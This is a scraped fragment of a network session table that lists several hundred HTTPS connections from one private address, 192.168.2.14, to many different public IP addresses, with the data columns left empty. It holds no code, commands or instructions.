                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12757192.168.2.144567432.177.204.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12758192.168.2.144209887.145.246.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12759192.168.2.1450456210.62.149.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12760192.168.2.145185044.45.37.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12761192.168.2.145480250.77.248.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12762192.168.2.144149299.170.62.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12763192.168.2.1448482151.14.202.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12764192.168.2.143739863.247.63.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12765192.168.2.1448742203.98.26.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12766192.168.2.143965435.15.39.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12767192.168.2.1442310168.52.222.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12768192.168.2.143825449.94.88.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12769192.168.2.145132279.6.141.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12770192.168.2.144548432.224.246.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12771192.168.2.1439888126.199.120.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12772192.168.2.143373696.138.150.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12773192.168.2.1437438149.228.91.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12774192.168.2.1436694168.16.114.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12775192.168.2.1458766174.6.125.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12776192.168.2.1459294144.151.114.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12777192.168.2.1455012154.61.31.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12778192.168.2.1452590140.147.18.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12779192.168.2.145563613.51.116.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12780192.168.2.1440924181.252.239.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12781192.168.2.1444564151.238.124.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12782192.168.2.1443638206.240.33.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12783192.168.2.1451370219.163.135.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12784192.168.2.1453636101.41.10.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12785192.168.2.143588839.183.142.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12786192.168.2.144085888.113.29.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12787192.168.2.1433200137.79.244.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12788192.168.2.1445410114.229.180.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12789192.168.2.1452698154.213.8.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12790192.168.2.1440736193.134.198.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12791192.168.2.1445142172.8.114.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12792192.168.2.143354280.99.6.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12793192.168.2.143441678.246.82.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12794192.168.2.14397969.199.15.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12795192.168.2.145958498.5.103.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12796192.168.2.1441972136.132.205.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12797192.168.2.1459912137.68.45.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12798192.168.2.1446628111.169.242.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12799192.168.2.1449790203.163.223.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12800192.168.2.1446174160.167.36.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12801192.168.2.1436988142.147.80.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12802192.168.2.1452904118.225.43.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12803192.168.2.1458368183.212.114.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12804192.168.2.1447896117.23.114.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12805192.168.2.1434450202.175.31.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12806192.168.2.144472031.182.3.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12807192.168.2.1440800157.66.141.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12808192.168.2.145323492.201.194.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12809192.168.2.1451174179.116.158.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12810192.168.2.1450614132.30.104.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12811192.168.2.144234299.58.132.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12812192.168.2.1439344143.165.187.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12813192.168.2.144360272.28.128.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12814192.168.2.14548442.100.85.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12815192.168.2.1454950116.56.26.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12816192.168.2.1433120111.246.158.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12817192.168.2.146037685.92.125.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12818192.168.2.144865690.49.175.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12819192.168.2.1445606125.37.159.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12820192.168.2.143781864.92.116.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12821192.168.2.1460608171.238.41.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12822192.168.2.1438030157.116.113.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12823192.168.2.1455816153.60.180.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12824192.168.2.1447514139.43.124.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12825192.168.2.1434720223.50.179.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12826192.168.2.1443050182.149.153.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12827192.168.2.1442172123.65.167.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12828192.168.2.144463486.199.251.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12829192.168.2.143452299.134.22.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12830192.168.2.1434934195.187.5.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12831192.168.2.143346857.142.99.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12832192.168.2.145792699.33.72.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12833192.168.2.145256853.57.75.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12834192.168.2.1434670125.137.15.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12835192.168.2.145709869.209.16.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12836192.168.2.143664235.210.182.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12837192.168.2.143569659.245.255.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12838192.168.2.143657298.119.49.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12839192.168.2.1451208165.2.147.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12840192.168.2.1454412138.25.156.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12841192.168.2.1439958188.140.248.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12842192.168.2.1434004164.56.96.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12843192.168.2.144725434.171.114.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12844192.168.2.145679664.88.94.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12845192.168.2.144946893.232.239.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12846192.168.2.145065813.126.170.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12847192.168.2.1448836107.121.66.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12848192.168.2.1433900206.141.169.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12849192.168.2.144976058.137.89.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12850192.168.2.1448492125.104.106.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12851192.168.2.144083250.196.150.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12852192.168.2.143462657.113.118.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12853192.168.2.1443858175.168.108.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12854192.168.2.1439296179.23.77.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12855192.168.2.1440936181.219.172.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12856192.168.2.1443180187.156.158.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12857192.168.2.1457694207.2.79.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12858192.168.2.1451238207.218.63.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12859192.168.2.1447142182.24.145.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12860192.168.2.145307294.220.45.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12861192.168.2.1433194108.0.187.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12862192.168.2.1459096169.167.12.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12863192.168.2.143992468.132.66.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12864192.168.2.143940253.72.29.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12865192.168.2.1438768169.251.123.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12866192.168.2.145881273.16.112.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12867192.168.2.1442206201.120.255.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12868192.168.2.1437592109.34.22.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12869192.168.2.1438174184.154.106.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12870192.168.2.1434644171.154.61.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12871192.168.2.144699414.253.117.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12872192.168.2.1439484192.24.143.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12873192.168.2.1443960138.20.240.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12874192.168.2.145788078.247.164.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12875192.168.2.1454200154.239.215.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12876192.168.2.1459340102.131.77.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12877192.168.2.1436430141.27.122.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12878192.168.2.1438220143.46.101.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12879192.168.2.1455272130.81.227.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12880192.168.2.144883881.207.47.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12881192.168.2.14515442.115.82.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12882192.168.2.1435556205.30.56.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12883192.168.2.145415480.56.63.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12884192.168.2.1449342131.12.227.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12885192.168.2.1443496180.132.10.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12886192.168.2.143926236.122.79.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12887192.168.2.1435902176.21.60.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12888192.168.2.145291869.202.156.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12889192.168.2.144992274.159.126.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12890192.168.2.14401768.87.35.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12891192.168.2.144009260.153.48.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12892192.168.2.1442502171.189.169.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12893192.168.2.1432850130.7.44.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12894192.168.2.1457588121.50.158.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12895192.168.2.145177439.219.140.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12896192.168.2.1447964175.230.143.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12897192.168.2.144787023.54.107.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12898192.168.2.14568701.135.232.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12899192.168.2.1437892207.165.136.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12900192.168.2.145369446.163.117.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12901192.168.2.1447232159.136.80.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12902192.168.2.1434762136.35.201.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12903192.168.2.143705859.109.86.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12904192.168.2.1455976132.83.71.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12905192.168.2.1459446217.15.232.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12906192.168.2.1442528148.43.250.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12907192.168.2.1439856209.201.55.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12908192.168.2.145016043.137.103.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12909192.168.2.1453222112.138.245.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12910192.168.2.1460688179.177.30.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12911192.168.2.145800679.130.104.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12912192.168.2.145653092.73.120.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12913192.168.2.1444064101.168.87.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12914192.168.2.1444658175.61.84.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12915192.168.2.1457810202.44.112.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12916192.168.2.14344509.222.3.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12917192.168.2.1440400163.72.68.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12918192.168.2.1453660166.152.150.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12919192.168.2.1460554191.215.197.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12920192.168.2.1445952184.73.248.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12921192.168.2.1439196132.183.59.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12922192.168.2.1452952205.102.168.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12923192.168.2.1458762176.223.103.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12924192.168.2.145825692.152.168.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12925192.168.2.145621866.179.67.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12926192.168.2.1441690164.162.54.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12927192.168.2.1441818176.134.21.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12928192.168.2.145970653.34.25.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12929192.168.2.1451320167.200.108.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12930192.168.2.1433342105.28.243.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12931192.168.2.1451720137.85.120.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12932192.168.2.1449108137.99.67.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12933192.168.2.1449864117.52.17.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12934192.168.2.1455796150.180.134.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12935192.168.2.1446644210.24.145.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12936192.168.2.1437202163.93.181.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12937192.168.2.1458834123.237.191.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12938192.168.2.145631475.224.41.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12939192.168.2.1454840216.60.179.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12940192.168.2.14347649.151.252.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12941192.168.2.143666084.32.16.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12942192.168.2.1433848160.90.62.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12943192.168.2.143503662.55.8.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12944192.168.2.143634268.8.207.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12945192.168.2.1448196123.0.207.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12946192.168.2.1453440159.193.166.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12947192.168.2.145023244.123.160.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12948192.168.2.145701066.253.147.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12949192.168.2.144988880.22.69.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12950192.168.2.1448734133.24.98.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12951192.168.2.1445680198.155.235.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12952192.168.2.145641236.116.71.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12953192.168.2.1436938161.40.230.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12954192.168.2.144388814.49.192.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12955192.168.2.143776434.160.176.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12956192.168.2.1453416222.252.99.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12957192.168.2.145876285.20.170.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12958192.168.2.1455752151.136.195.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12959192.168.2.144045482.155.230.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12960192.168.2.1457812190.172.74.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12961192.168.2.1434140121.106.27.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12962192.168.2.1447468169.205.225.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12963192.168.2.1443484133.63.115.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12964192.168.2.1459688158.217.125.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12965192.168.2.14352002.55.22.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12966192.168.2.145757236.160.211.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12967192.168.2.1457230133.217.166.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12968192.168.2.144875283.241.145.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
